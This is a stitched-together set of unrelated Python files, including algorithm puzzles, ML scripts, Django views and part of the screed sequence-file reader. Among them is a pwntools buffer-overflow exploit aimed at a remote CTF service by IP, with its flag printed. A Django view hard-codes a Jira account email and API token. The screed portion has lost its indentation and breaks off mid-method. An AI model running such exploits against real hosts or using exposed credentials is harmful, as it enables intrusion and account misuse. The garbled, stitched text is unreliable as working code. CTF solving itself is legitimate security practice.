        :type board: List[List[str]]
        :rtype: void Do not return anything, modify board in-place instead.

        BFS from every border 'O': any 'O' reachable from the border is not
        surrounded and survives; every other 'O' is captured (flipped to 'X').

        Fixes: the original left helper() as an unfinished syntax error, never
        marked visited cells and never flipped any region.
        """
        if not board or not board[0]:
            return
        from collections import deque
        m, n = len(board), len(board[0])
        queue = deque()

        def mark(i, j):
            # Mark an in-bounds live 'O' as safe ('S') and enqueue it.
            if 0 <= i < m and 0 <= j < n and board[i][j] == 'O':
                board[i][j] = 'S'
                queue.append((i, j))

        # Seed the search with every 'O' on the border.
        for col in range(n):
            mark(0, col)
            mark(m - 1, col)
        for row in range(m):
            mark(row, 0)
            mark(row, n - 1)

        # Flood-fill inward from the border.
        while queue:
            x, y = queue.popleft()
            mark(x - 1, y)
            mark(x + 1, y)
            mark(x, y + 1)
            mark(x, y - 1)

        # Safe cells revert to 'O'; every remaining 'O' is captured.
        for row in range(m):
            for col in range(n):
                board[row][col] = 'O' if board[row][col] == 'S' else 'X'
|
from django.db import models
# Create your models here.
class Post(models.Model):
    """A simple record holding a name and a free-text address."""
    # Display name (Indonesian: "nama" = name).
    nama = models.CharField(max_length=255)
    # Free-form address ("alamat" = address).
    alamat = models.TextField()

    def __str__(self):
        # Human-readable representation used by the admin and shell.
        return "{}".format(self.nama)
# -*- coding: utf-8 -*-
# flake8: noqa
from rest_framework.mixins import DestroyModelMixin as DeleteMixin
from rest_framework.mixins import RetrieveModelMixin as RetrieveMixin
from rest_framework.mixins import UpdateModelMixin as UpdateMixin
from .creation import CreateMixin
from .pagination import ListMixin
|
class Base(object):
    """Root of the demo hierarchy."""
    pass


class Derived(Base):
    """Subclass used to illustrate issubclass/isinstance direction."""
    pass


# issubclass is directional: Derived is a Base, but not vice versa.
print(issubclass(Derived, Base))
print(issubclass(Base, Derived))

d = Derived()
b = Base()
# isinstance follows the same direction for instances.
print(isinstance(b, Derived))
print(isinstance(d, Base))
|
import sys

# Bitmask-backed set over elements 1..20, driven by commands on stdin:
# "add x", "remove x", "check x", "toggle x", "all", "empty".
S = 0
M = int(sys.stdin.readline().strip())
for _ in range(0, M):
    cmd = sys.stdin.readline().strip()
    if ' ' in cmd:
        # Argument commands carry a 1-based element; convert to a bit mask.
        cmd, arg = cmd.split()
        bit = 1 << (int(arg) - 1)
    if cmd == "add":
        S |= bit
    elif cmd == "remove":
        S &= ~bit
    elif cmd == "check":
        print(1 if S & bit else 0)
    elif cmd == "toggle":
        S ^= bit
    elif cmd == "all":
        # Set all 20 bits at once.
        S = (1 << 20) - 1
    elif cmd == "empty":
        S = 0
|
import argparse

# Reusable parent parser (no -h of its own) that only knows how to report
# the script version via the standard 'version' action.
version_parser = argparse.ArgumentParser(add_help=False)
version_parser.add_argument(
    '--version',
    action='version',
    version='%(prog)s script version: 1.0',
)
|
from typing import Callable, List

# Bug fix: `Vector = [float]` built a one-element list instance, not a type
# alias — annotations using it were meaningless. List[float] is the alias
# that was intended.
Vector = List[float]
ActivationFunc = Callable[[float], float]
def neuron(inputs: Vector, weights: Vector, activation_func: ActivationFunc) -> float:
    """Weighted sum of a bias (fixed input 1.0) plus *inputs*, passed through
    *activation_func*. weights[0] is the bias weight."""
    biased_inputs = [1.0] + inputs
    total = sum(x * w for x, w in zip(biased_inputs, weights))
    return activation_func(total)
def step(x: float) -> float:
    """Heaviside step activation: 1 for positive input, else 0."""
    if x > 0:
        return 1
    return 0
# Perceptron weights: bias weight first, then one weight per input feature.
weights = [-0.25, 1, -0.45]
# Two feature vectors to classify.
glenmorangie = [-0.21, 0.18]
talisker = [0.6, -0.31]
print("Glenmorangie:", neuron(glenmorangie, weights, step))
print("Talisker:", neuron(talisker, weights, step))
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from q3_run import *
from cs224d.data_utils import *
# Experiment hyperparameters: context window, embedding width, LSTM hidden
# size, minibatch size, LSTM layer count and sequence length.
CONTEXT_SIZE = 5
EMBEDDING_DIM = 10
HIDDEN = 30
BATCH_SIZE = 5
NUM_LAYER=2
SEQ = 1
class LSTMTagger(nn.Module):
    """LSTM over word embeddings followed by a linear projection to tag scores.

    Relies on the module-level NUM_LAYER / BATCH_SIZE / SEQ constants for
    the hidden-state and input shapes.
    """

    def __init__(self, embedding_dim, hidden_dim, tagset_size):
        super(LSTMTagger, self).__init__()
        self.hidden_dim = hidden_dim
        # The LSTM maps embedding vectors to hidden states of size hidden_dim.
        self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=NUM_LAYER)
        # Project hidden states onto the tag vocabulary.
        self.hidden2tag = nn.Linear(hidden_dim, tagset_size)
        self.hidden = self.init_hidden()

    def init_hidden(self):
        # Fresh (h0, c0) state; axes are (num_layers, minibatch, hidden_dim).
        shape = (NUM_LAYER, BATCH_SIZE, self.hidden_dim)
        return (torch.zeros(*shape), torch.zeros(*shape))

    def forward(self, sentence):
        # Reshape to the (seq, batch, features) layout nn.LSTM expects.
        reshaped = sentence.view(SEQ, BATCH_SIZE, -1)
        lstm_out, self.hidden = self.lstm(reshaped, self.hidden)
        tag_space = self.hidden2tag(lstm_out.view(BATCH_SIZE, -1))
        return F.log_softmax(tag_space, dim=1)
# --- Script: build 5-word context windows from the Stanford Sentiment
# corpus, load a trained LSTM and estimate perplexity on a few batches ---
total=[]
dataset = StanfordSentiment()
# Flatten the corpus into one long token list.
for sentence in dataset.sentences():
    for w in sentence:
        total.append(w)
print(len(total))
train_sentence = total[:20000]
# print(total)
# we should tokenize the input, but we will ignore that for now
# build a list of tuples. Each tuple is ([ word_i-2, word_i-1 ], target word)
# Each entry packs five overlapping 5-word context windows (25 tokens) with
# the five following target words; windows advance by 5 tokens.
trigrams = [([train_sentence[i], train_sentence[i + 1], train_sentence[i + 2], train_sentence[i + 3], train_sentence[i + 4],
              train_sentence[i+1], train_sentence[i+2], train_sentence[i+3], train_sentence[i+4], train_sentence[i+5],
              train_sentence[i+2], train_sentence[i+3], train_sentence[i+4], train_sentence[i+5], train_sentence[i+6],
              train_sentence[i+3], train_sentence[i+4], train_sentence[i+5], train_sentence[i+6], train_sentence[i+7],
              train_sentence[i+4], train_sentence[i+5], train_sentence[i+6], train_sentence[i+7], train_sentence[i+8]],
             [train_sentence[i + 5], train_sentence[i+6], train_sentence[i+7], train_sentence[i+8], train_sentence[i+9]])
            for i in range(0, len(train_sentence)-5, 5)]
# print the first 3, just so you can see what they look like
print(trigrams[:3])
# print(train_sentence)
vocab = set(train_sentence)
word_to_ix = {word: i for i, word in enumerate(vocab)}
# Pre-trained word vectors and tokenizer mapping from q3_run.
dic_list, tok = create_vector()
print(dic_list)
model = LSTMTagger( EMBEDDING_DIM* CONTEXT_SIZE , HIDDEN, len(vocab))
model.load_state_dict(torch.load('epoch_10_LSTM_50_layer3_seq1_batch5'))
# Perplexity accumulator: product of target probabilities over `count` words.
product = 1
count = 0
for context, target in trigrams:
    # Concatenate the embedding of every context token into one flat vector.
    vec = []
    for i in context:
        vec = np.append(vec, dic_list[tok[i.lower()]])
    log_probs = model(torch.tensor(vec, dtype=torch.float))
    for j in range(BATCH_SIZE):
        index = word_to_ix[target[j]]
        # print(log_probs[j][index])
        prob = np.exp(log_probs[j][index].detach().numpy())
        product *= prob
    count += 5
    # Stop after two batches (10 target words) and report perplexity.
    # NOTE(review): original indentation was lost; count/check placement
    # reconstructed so the early exit actually triggers — verify.
    if count == 10:
        print(count)
        PP=product **(-1/count)
        print(PP)
        break
def bowlingScore(frames):
    """Score a complete bowling game.

    *frames* is ten space-separated frames: 'X' for a strike, '/' for a
    spare, digits for pin counts; the tenth frame may hold up to three
    rolls. Returns the integer total score.
    """
    frame = frames.split(" ")
    # rolls mirrors `frame` with numeric pin values; the tenth frame gets
    # extra slots so three rolls can always be indexed safely.
    rolls = [[0, 0] for _ in range(9)] + [[0, 0, 0, 0, 0]]
    total = 0
    # Pad the tenth frame so rolls 0..2 always exist.
    frame[9] += "0"
    for i in range(0, 3):
        rolls[9][i] = checkValue(frame[9][i])
        if rolls[9][i] == "/":
            rolls[9][i] = addSpare(rolls[9][i - 1])
    # Resolve frames 9..1: second roll is None for a lone strike, and a
    # spare becomes the pins needed to reach 10.
    for i in range(8, -1, -1):
        rolls[i][0] = checkValue(frame[i][0])
        rolls[i][1] = checkValue(frame[i][1]) if len(frame[i]) != 1 else None
        if rolls[i][1] == "/":
            rolls[i][1] = addSpare(rolls[i][0])
    # Tenth frame scores at face value (a strike char is worth 10).
    for i in range(0, 3):
        if frame[9][i] == "X":
            total += 10
        else:
            total += int(rolls[9][i])
    # Frames 9..1: strikes add the next two rolls, spares the next one.
    for i in range(8, -1, -1):
        if frame[i][0] == "X":
            total += 10 + rolls[i + 1][0]
            if rolls[i + 1][1] is None:
                # Next frame was also a strike: reach one frame further.
                total += rolls[i + 2][0]
            else:
                total += rolls[i + 1][1]
        elif frame[i][1] == "/":
            total += 10 + rolls[i + 1][0]
        else:
            total += rolls[i][0] + rolls[i][1]
    return total


def checkValue(pin):
    """Numeric value of one roll character: 10 for 'X', '/' passes through."""
    if pin == "X":
        return 10
    if pin == "/":
        return "/"
    return int(pin)


def addSpare(pin):
    """Pins knocked by the spare roll: whatever was left standing."""
    return 10 - int(pin)
# Quick manual check of the scorer plus a random-game generator.
xs = bowlingScore('00 00 00 00 00 00 00 00 X 0/X')
# xs = bowlingScore('11 11 11 11 11 11 11 11 11 11')
print xs
# test.it("maybe this bowler should put bumpers on")
# test.assert_equals(bowlingScore('11 11 11 11 11 11 11 11 11 11'), 20)
# test.it("woah! Perfect game!")
# test.assert_equals(bowlingScore('X X X X X X X X X XXX'), 300)
#
# test.assert_equals(bowlingScore('11 11 11 11 11 11 11 11 11 11'), 20)
# test.assert_equals(bowlingScore('X X X X X X X X X XXX'), 300)
# test.assert_equals(bowlingScore('00 5/ 4/ 53 33 22 4/ 5/ 45 XXX'), 115)
# test.assert_equals(bowlingScore('5/ 4/ 3/ 2/ 1/ 0/ X 9/ 4/ 8/8'), 150)
# test.assert_equals(bowlingScore('5/ 4/ 3/ 2/ 1/ 0/ X 9/ 4/ 7/2'), 143)
# test.assert_equals(bowlingScore('X X 9/ 80 X X 90 8/ 7/ 44'), 171)
# test.assert_equals(bowlingScore('6/ 5/ 6/ 2/ 3/ 0/ 1/ 8/ 3/ 6/5'), 139)
# test.assert_equals(bowlingScore('00 00 00 00 00 00 00 00 00 0/X'), 20)
import random
# Generate one random (legal-ish) game string: nine random frames plus a
# tenth frame drawn from a fixed pool.
for rtest in range(0,1):
    xframe = []
    for pinchoice in range(0,9):
        xpin1 = random.randint(0,10)
        if xpin1 != 10:
            xpin2 = random.randint(0,10-xpin1)
            if xpin1 + xpin2 == 10:
                xframe.append(str(xpin1)+"/")
            else:
                xframe.append(str(xpin1)+str(xpin2))
        else:
            xframe.append("X")
    xendframe = ["XXX","12","1/X","34","53","XX1"]
    xframe.append(xendframe[random.randint(0,len(xendframe)-1)])
    xframe = " ".join(xframe)
    print xframe
|
from pwn import *
# s= process('./notepad')
# CTF exploit: overflow a note buffer to redirect execution to the binary's
# `secret` function on the remote service.
s = remote("46.101.23.188",32663)
elf = ELF('./notepad')
pause()
# Address of the win function taken from the (non-PIE) binary's symbols.
secret_func = elf.symbols['secret']
log.info("secret at: 0x%x"%secret_func)
def add_note(size,note):
    # Drive the menu: option 1 = create a note of the given size/content.
    s.sendlineafter(">","1")
    s.sendlineafter('size',str(size))
    s.sendlineafter("Note:",str(note))
# 0x50 bytes of padding, then the saved return address overwritten (twice,
# for safety) with the address of `secret`.
payload = b'n'*0x50+ p64(secret_func)*2
add_note(10,'tuanle')
add_note(10,'tuanle')
add_note(10,'tuanle')
s.sendlineafter("do you want to use it? (y/n)",payload)
# s.sendlineafter('size',str(10))
# s.sendlineafter("Note:","lala")
s.interactive()
s.close()
# HTB{4lw4ys_ch4ck_l3ngth_0f_n0t3s}
# Basic training configuration file
import torch
from torch.optim import Adam
from torch.optim.lr_scheduler import MultiStepLR
from torchvision.transforms import RandomHorizontalFlip, Compose, RandomResizedCrop
from torchvision.transforms import FiveCrop, Lambda, Resize
from torchvision.transforms import ColorJitter, ToTensor, Normalize
from common.dataset import FilesFromCsvDataset
from common.data_loaders import get_data_loader
from models.model_on_crops import FurnitureModelOnCrops
from pretrainedmodels.models.inceptionv4 import inceptionv4
# Run configuration: reproducibility seed, device and artifact directory.
SEED = 12
DEBUG = True
DEVICE = 'cuda'
OUTPUT_PATH = "output"

# Per-crop augmentations applied after the multi-crop branching below.
single_img_augs = Compose([
    RandomHorizontalFlip(p=0.5),
    ColorJitter(hue=0.12, brightness=0.12),
    ToTensor(),
    Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])
])

size = 180
# Branch 1: one random resized crop. Branch 2: resize then five fixed crops.
augs_branch_1 = RandomResizedCrop(size, scale=(0.7, 1.0), interpolation=2)
augs_branch_2 = Compose([Resize(int(1.9 * size), interpolation=2), FiveCrop(size=size)])
# Produce six crops per image (1 random + 5 fixed) stacked into one tensor.
TRAIN_TRANSFORMS = Compose([
    Lambda(lambda img: (augs_branch_1(img), ) + augs_branch_2(img)),
    Lambda(lambda crops: torch.stack([single_img_augs(crop) for crop in crops]))
])
# Validation uses the same stochastic pipeline as training here.
VAL_TRANSFORMS = TRAIN_TRANSFORMS

BATCH_SIZE = 24
NUM_WORKERS = 15

dataset = FilesFromCsvDataset("output/unique_filtered_train_dataset.csv")
TRAIN_LOADER = get_data_loader(dataset,
                               data_transform=TRAIN_TRANSFORMS,
                               batch_size=BATCH_SIZE,
                               num_workers=NUM_WORKERS,
                               pin_memory='cuda' in DEVICE)

val_dataset = FilesFromCsvDataset("output/unique_filtered_val_dataset.csv")
VAL_LOADER = get_data_loader(val_dataset,
                             data_transform=VAL_TRANSFORMS,
                             batch_size=BATCH_SIZE,
                             num_workers=NUM_WORKERS,
                             pin_memory='cuda' in DEVICE)

# ImageNet-pretrained InceptionV4 backbone feeding the crop-based classifier.
base_model = inceptionv4(num_classes=1000, pretrained='imagenet')
MODEL = FurnitureModelOnCrops(features=base_model.features, featuremap_output_size=1536, n_cls_layers=1024)

N_EPOCHS = 100

# Per-module learning rates: small for the pretrained features, larger for
# the freshly initialized classifier heads.
OPTIM = Adam(
    params=[
        {"params": MODEL.base_features.parameters(), 'lr': 0.0001},
        {"params": MODEL.crop_classifiers.parameters(), 'lr': 0.001},
        {"params": MODEL.final_classifier.parameters(), 'lr': 0.002},
    ],
)

# Decay LR by 0.8 every other epoch from epoch 5 to 49.
LR_SCHEDULERS = [
    MultiStepLR(OPTIM, milestones=list(range(5, 50, 2)), gamma=0.8)
]
# REDUCE_LR_ON_PLATEAU = ReduceLROnPlateau(OPTIM, mode='min', factor=0.5, patience=5, threshold=0.05, verbose=True)

EARLY_STOPPING_KWARGS = {
    'patience': 30,
    # 'score_function': None
}

LOG_INTERVAL = 100
|
import numpy as np
import numba as nb
@nb.njit(cache=True)
def as_rect(tlbr):
    """Return *tlbr* as a float64 array rounded to the nearest integers."""
    box = np.asarray(tlbr, np.float64)
    return np.rint(box)
@nb.njit(cache=True)
def get_size(tlbr):
    """Width/height of an inclusive tlbr box: br - tl + 1."""
    return tlbr[2:] - tlbr[:2] + 1
@nb.njit(cache=True)
def area(tlbr):
    """Pixel area of an inclusive tlbr box, as an int."""
    wh = get_size(tlbr)
    return int(wh[0] * wh[1])
@nb.njit(cache=True)
def mask_area(mask):
    """Number of nonzero (foreground) elements in *mask*."""
    return np.count_nonzero(mask)
@nb.njit(cache=True)
def get_center(tlbr):
    """Midpoint (x, y) of a tlbr box."""
    cx = (tlbr[0] + tlbr[2]) / 2
    cy = (tlbr[1] + tlbr[3]) / 2
    return np.array([cx, cy])
@nb.njit(cache=True)
def to_tlwh(tlbr):
    """Convert [xmin, ymin, xmax, ymax] to [x, y, w, h] (inclusive sizes)."""
    return np.append(tlbr[:2], get_size(tlbr))
@nb.njit(cache=True)
def to_tlbr(tlwh):
    """Convert [x, y, w, h] to an integer-rounded inclusive [xmin, ymin, xmax, ymax]."""
    box = np.rint(np.asarray(tlwh, np.float64))
    tl = box[:2]
    br = tl + box[2:] - 1
    return np.append(tl, br)
@nb.njit(cache=True)
def intersection(tlbr1, tlbr2):
    """Overlap box of two tlbr boxes, or None when they are disjoint."""
    tl = np.maximum(tlbr1[:2], tlbr2[:2])
    br = np.minimum(tlbr1[2:], tlbr2[2:])
    overlap = np.append(tl, br)
    # A non-positive width or height means no overlap.
    if np.any(get_size(overlap) <= 0):
        return None
    return overlap
@nb.njit(cache=True)
def union(tlbr1, tlbr2):
    """Smallest tlbr box enclosing both input boxes."""
    tl = np.minimum(tlbr1[:2], tlbr2[:2])
    br = np.maximum(tlbr1[2:], tlbr2[2:])
    return np.append(tl, br)
@nb.njit(cache=True)
def crop(img, tlbr):
    """Slice of *img* covering the inclusive tlbr region."""
    box = tlbr.astype(np.int_)
    return img[box[1]:box[3] + 1, box[0]:box[2] + 1]
@nb.njit(cache=True)
def multi_crop(img, tlbrs):
    """List of inclusive crops of *img*, one per row of *tlbrs*."""
    boxes = tlbrs.astype(np.int_)
    out = []
    for i in range(len(boxes)):
        out.append(img[boxes[i][1]:boxes[i][3] + 1, boxes[i][0]:boxes[i][2] + 1])
    return out
@nb.njit(fastmath=True, cache=True)
def iom(tlbr1, tlbr2):
    """
    Computes intersection over minimum.
    """
    overlap = intersection(tlbr1, tlbr2)
    if overlap is None:
        return 0.
    smaller = min(area(tlbr1), area(tlbr2))
    return area(overlap) / smaller
@nb.njit(fastmath=True, cache=True)
def transform(pts, m):
    """
    Numba implementation of OpenCV's transform.
    """
    pts2 = np.atleast_2d(np.asarray(pts))
    # Append a homogeneous coordinate of 1 to every point.
    ones = np.ones((len(pts2), 1))
    homo = np.concatenate((pts2, ones), axis=1)
    return homo @ m.T
@nb.njit(fastmath=True, cache=True)
def perspective_transform(pts, m):
    """
    Numba implementation of OpenCV's perspectiveTransform.
    """
    pts2 = np.atleast_2d(np.asarray(pts))
    # Homogeneous coordinates, points as columns.
    ones = np.ones((len(pts2), 1))
    homo = np.concatenate((pts2, ones), axis=1).T
    proj = m @ homo
    # Divide through by the homogeneous component.
    proj = proj / proj[-1]
    return proj[:2].T
@nb.njit(fastmath=True, cache=True)
def nms(tlwhs, scores, nms_thresh):
    """
    Applies the Non-Maximum Suppression algorithm on the bounding boxes [x, y, w, h]
    with their confidence scores and return an array with the indexes of the bounding
    boxes we want to keep
    """
    areas = tlwhs[:, 2] * tlwhs[:, 3]
    # Candidate order: highest score first.
    ordered = scores.argsort()[::-1]
    tl = tlwhs[:, :2]
    # Inclusive bottom-right corners.
    br = tlwhs[:, :2] + tlwhs[:, 2:] - 1
    keep = []
    while ordered.size > 0:
        # index of the current element
        i = ordered[0]
        keep.append(i)
        # compute IOU
        candidate_tl = tl[ordered[1:]]
        candidate_br = br[ordered[1:]]
        overlap_xmin = np.maximum(tl[i, 0], candidate_tl[:, 0])
        overlap_ymin = np.maximum(tl[i, 1], candidate_tl[:, 1])
        overlap_xmax = np.minimum(br[i, 0], candidate_br[:, 0])
        overlap_ymax = np.minimum(br[i, 1], candidate_br[:, 1])
        width = np.maximum(0, overlap_xmax - overlap_xmin + 1)
        height = np.maximum(0, overlap_ymax - overlap_ymin + 1)
        area_intersection = width * height
        area_union = areas[i] + areas[ordered[1:]] - area_intersection
        iou = area_intersection / area_union
        # Keep only candidates that do not overlap the winner too much;
        # +1 re-aligns indices because iou was computed over ordered[1:].
        idx = np.where(iou <= nms_thresh)[0]
        ordered = ordered[idx + 1]
    keep = np.asarray(keep)
    return keep
|
from .models import *
from django.http import HttpResponse
from .serializers import *
import datetime
from django.http import JsonResponse
from django.core.mail import BadHeaderError, send_mail
from datetime import date,timedelta
import json
from django.conf import settings
from rest_framework import status
from rest_framework.permissions import IsAuthenticated
from rest_framework_simplejwt.authentication import JWTAuthentication
from django.core import serializers
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework import generics
from jira import JIRA
# SECURITY(review): hard-coded Jira credentials committed to source control —
# this API token should be rotated and loaded from settings/environment.
auth_jira = JIRA('https://cogniable.atlassian.net', basic_auth=('kohlimanu@gmail.com', 'QbvAH5jVtFrMykcKfgq8A81E'))
class CreateTicket(APIView):
    """List existing support tickets and create new ones (JWT-protected)."""
    authentication_classes = (JWTAuthentication,)
    permission_classes = (IsAuthenticated,)
    serializer_class = TicketsSerializer

    def get(self, request, format=None):
        """Return every ticket, serialized, in the standard response envelope."""
        ticket_obj = Tickets.objects.all()
        serializer = self.serializer_class(ticket_obj, many=True)
        res_dict = {
            'status': 1,
            'detail': "tickets Api",
            'data': serializer.data,
        }
        return Response(res_dict, status=status.HTTP_200_OK)

    def post(self, request, format=None):
        """Validate and save a new ticket with the initial status (id=1).

        Fixes: corrected the "ceated" typo in the success message and removed
        the duplicated/unused validated_data lookups (assign_to fetched twice,
        subject/description/attachments never used).
        """
        serializer = TicketsSerializer(data=request.data)
        if serializer.is_valid():
            serializer.save(status=TicketStatus.objects.get(id=1))
            res_dict = {
                'status': 1,
                'detail': "Ticket created Successfully",
            }
            return Response(res_dict, status=status.HTTP_200_OK)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# Copyright (c) 2008, Michigan State University.
"""Reader and writer for screed."""
from __future__ import absolute_import
import os
import io
import sys
import gzip
import bz2
from collections.abc import MutableMapping
try:
import sqlite3
except ImportError:
pass
from . import DBConstants
from . import screedRecord
from .fastq import fastq_iter
from .fasta import fasta_iter
from .utils import to_str
def _normalize_filename(filename):
"""Map '-' to '/dev/stdin' to handle the usual shortcut."""
if filename == '-':
filename = '/dev/stdin'
return filename
class Open(object):
    """Iterable/context-manager wrapper that auto-detects how to parse a
    sequence file: sniffs gzip/bzip2 compression by magic bytes, then picks
    FASTA vs FASTQ by the record's first character ('>' vs '@')."""

    def __init__(self, filename, *args, **kwargs):
        # Underlying file handle; set by open_reader(), released by close().
        self.sequencefile = None
        self.iter_fn = self.open_reader(filename, *args, **kwargs)
        if self.iter_fn:
            self.__name__ = self.iter_fn.__name__

    def open_reader(self, filename, *args, **kwargs):
        """
        Make a best-effort guess as to how to parse the given sequence file.
        Handles '-' as shortcut for stdin.
        Deals with .gz, FASTA, and FASTQ records.

        Returns a record iterator (or [] for an empty file); raises
        ValueError for unrecognized formats or non-seekable gzip input.
        """
        # Magic-byte prefixes used to sniff the compression format.
        magic_dict = {
            b"\x1f\x8b\x08": "gz",
            b"\x42\x5a\x68": "bz2",
            # "\x50\x4b\x03\x04": "zip"
        }  # Inspired by http://stackoverflow.com/a/13044946/1585509
        filename = _normalize_filename(filename)
        bufferedfile = io.open(file=filename, mode='rb', buffering=8192)
        # peek() inspects the buffer without consuming the stream.
        num_bytes_to_peek = max(len(x) for x in magic_dict)
        file_start = bufferedfile.peek(num_bytes_to_peek)
        compression = None
        for magic, ftype in magic_dict.items():
            if file_start.startswith(magic):
                compression = ftype
                break
        if compression == 'bz2':
            sequencefile = bz2.BZ2File(filename=bufferedfile)
            peek = sequencefile.peek(1)
        elif compression == 'gz':
            # GzipFile is reopened by name (needs a seekable source), so the
            # sniffing handle is discarded below.
            if not bufferedfile.seekable():
                bufferedfile.close()
                raise ValueError("gziped data not streamable, pipe "
                                 "through zcat first")
            peek = gzip.GzipFile(filename=filename).read(1)
            sequencefile = gzip.GzipFile(filename=filename)
            bufferedfile.close()
        else:
            peek = bufferedfile.peek(1)
            sequencefile = bufferedfile
        iter_fn = None
        try:
            first_char = peek[0]
        except IndexError as err:
            return []  # empty file
        # On Py3 bytes indexing yields an int (chr() maps it to a str); on
        # Py2 it is already a one-char str and chr() raises TypeError.
        try:
            first_char = chr(first_char)
        except TypeError:
            pass
        if first_char == '>':
            iter_fn = fasta_iter
        elif first_char == '@':
            iter_fn = fastq_iter
        if iter_fn is None:
            raise ValueError("unknown file format for '%s'" % filename)
        self.sequencefile = sequencefile
        return iter_fn(sequencefile, *args, **kwargs)

    def __enter__(self):
        # The context manager yields the record iterator, not self.
        return self.iter_fn

    def __exit__(self, *exc_info):
        self.close()

    def __iter__(self):
        if self.iter_fn:
            return self.iter_fn
        return iter(())  # empty file -> empty iteration

    def close(self):
        """Close the underlying file handle, if one was opened."""
        if self.sequencefile is not None:
            self.sequencefile.close()
class ScreedDB(MutableMapping):
    """
    Core on-disk dictionary interface for reading screed databases. Accepts a
    path string to a screed database.

    The database is strictly read-only: all mutating MutableMapping methods
    raise NotImplementedError.
    """

    def __init__(self, filepath):
        # Set _db first so close()/__del__ are safe even if __init__ fails.
        self._db = None
        try:
            sqlite3
        except NameError:
            raise Exception("error: sqlite3 is needed for this " +
                            "functionality, but is not installed.")
        self._filepath = filepath
        if not self._filepath.endswith(DBConstants.fileExtension):
            self._filepath += DBConstants.fileExtension
        if not os.path.exists(self._filepath):
            raise ValueError('No such file: %s' % self._filepath)
        self._db = sqlite3.connect(self._filepath)
        cursor = self._db.cursor()
        # Make sure the database is a prepared screed database: exactly the
        # dictionary table plus the admin table, in name order.
        query = "SELECT name FROM sqlite_master WHERE type='table' "\
                "ORDER BY name"
        res = cursor.execute(query)
        try:
            # Unpacking fetchone() raises TypeError when it returns None.
            dictionary_table, = res.fetchone()
            admin_table, = res.fetchone()
            if dictionary_table != DBConstants._DICT_TABLE:
                raise TypeError
            if admin_table != DBConstants._SCREEDADMIN:
                raise TypeError
        except TypeError:
            self._db.close()
            raise TypeError("Database %s is not a proper screed database"
                            % self._filepath)
        nothing = res.fetchone()
        if nothing is not None:
            self._db.close()
            # BUG FIX: previously referenced the undefined name 'filename',
            # which raised NameError instead of the intended TypeError.
            raise TypeError("Database %s has too many tables."
                            % self._filepath)
        # Store the fields of the admin table as (name, role) tuples.
        query = "SELECT %s, %s FROM %s" % \
                (DBConstants._FIELDNAME,
                 DBConstants._ROLENAME,
                 DBConstants._SCREEDADMIN)
        res = cursor.execute(query)
        self.fields = tuple([(str(field), role) for field, role in res])
        # Column used for key lookups: the field flagged as the indexed text
        # key, defaulting to the second field when none is flagged.
        self._queryBy = self.fields[1][0]
        for fieldname, role in self.fields:
            if role == DBConstants._INDEXED_TEXT_KEY:
                self._queryBy = fieldname
        # Sqlite PRAGMA settings for speed.
        cursor.execute("PRAGMA cache_size=2000")
        # Record count == max primary key (keys are 1-based and contiguous).
        query = 'SELECT MAX(%s) FROM %s' % (DBConstants._PRIMARY_KEY,
                                            DBConstants._DICT_TABLE)
        self._len, = cursor.execute(query).fetchone()

    def __del__(self):
        """
        Alias for close()
        """
        self.close()

    def close(self):
        """
        Closes the sqlite database handle. Safe to call more than once.
        """
        if self._db is not None:
            self._db.close()
            self._db = None

    def __getitem__(self, key):
        """
        Retrieves from database the record with the key 'key'
        """
        cursor = self._db.cursor()
        key = str(key)  # So lazy retrieval objects are evaluated
        query = 'SELECT %s FROM %s WHERE %s=?' % (self._queryBy,
                                                  DBConstants._DICT_TABLE,
                                                  self._queryBy)
        res = cursor.execute(query, (key,))
        if res.fetchone() is None:
            raise KeyError("Key %s not found" % key)
        return screedRecord._buildRecord(self.fields, self._db,
                                         key,
                                         self._queryBy)

    def values(self):
        """
        Retrieves all records from the database and returns them as a list
        """
        return list(self.itervalues())

    def items(self):
        """
        Retrieves all records from the database and returns them as a list of
        (key, record) tuple pairs
        """
        return list(self.iteritems())

    def loadRecordByIndex(self, index):
        """
        Retrieves record from database at the given 0-based index
        """
        cursor = self._db.cursor()
        index = int(index) + 1  # Primary keys are 1-based in sqlite
        query = 'SELECT %s FROM %s WHERE %s=?' % (DBConstants._PRIMARY_KEY,
                                                  DBConstants._DICT_TABLE,
                                                  DBConstants._PRIMARY_KEY)
        res = cursor.execute(query, (index,))
        if res.fetchone() is None:
            raise KeyError("Index %d not found" % index)
        return screedRecord._buildRecord(self.fields, self._db,
                                         index,
                                         DBConstants._PRIMARY_KEY)

    def __len__(self):
        """
        Returns the number of records in the database
        """
        return self._len

    def keys(self):
        """
        Returns a list of keys in the database
        """
        return list(self.iterkeys())

    def __repr__(self):
        """
        Returns a string with some general information about the database
        """
        return "<%s, '%s'>" % (self.__class__.__name__,
                               self._filepath)

    def itervalues(self):
        """
        Iterator over records in the database
        """
        for index in range(1, self.__len__() + 1):
            yield screedRecord._buildRecord(self.fields, self._db,
                                            index,
                                            DBConstants._PRIMARY_KEY)

    def iterkeys(self):
        """
        Iterator over keys in the database
        """
        cursor = self._db.cursor()
        query = 'SELECT %s FROM %s ORDER BY id' % (
            self._queryBy, DBConstants._DICT_TABLE)
        for key, in cursor.execute(query):
            yield key

    def __iter__(self):
        return self.iterkeys()

    def iteritems(self):
        """
        Iterator returning (index, record) pairs
        """
        for v in self.itervalues():
            yield v[DBConstants._PRIMARY_KEY], v

    def has_key(self, key):
        """
        Returns true if given key exists in database, false otherwise
        """
        return key in self

    def copy(self):
        """
        Returns shallow copy (the database is read-only, so self suffices)
        """
        return self

    def __contains__(self, key):
        """
        Returns true if given key exists in database, false otherwise
        """
        cursor = self._db.cursor()
        query = 'SELECT %s FROM %s WHERE %s = ?' % \
                (self._queryBy, DBConstants._DICT_TABLE, self._queryBy)
        if cursor.execute(query, (key,)).fetchone() is None:
            return False
        return True

    # Here follow the methods that are not implemented.
    # FIX: signatures now match the mapping protocol so callers get the
    # intended NotImplementedError rather than an arity TypeError.
    def __setitem__(self, key, value):
        """
        Not implemented (Read-only database)
        """
        raise NotImplementedError

    def __delitem__(self, key):
        """
        Not implemented (Read-only database)
        """
        raise NotImplementedError

    def clear(self):
        """
        Not implemented (Read-only database)
        """
        raise NotImplementedError

    def update(self, *args, **kwargs):
        """
        Not implemented (Read-only database)
        """
        raise NotImplementedError

    def setdefault(self, key, default=None):
        """
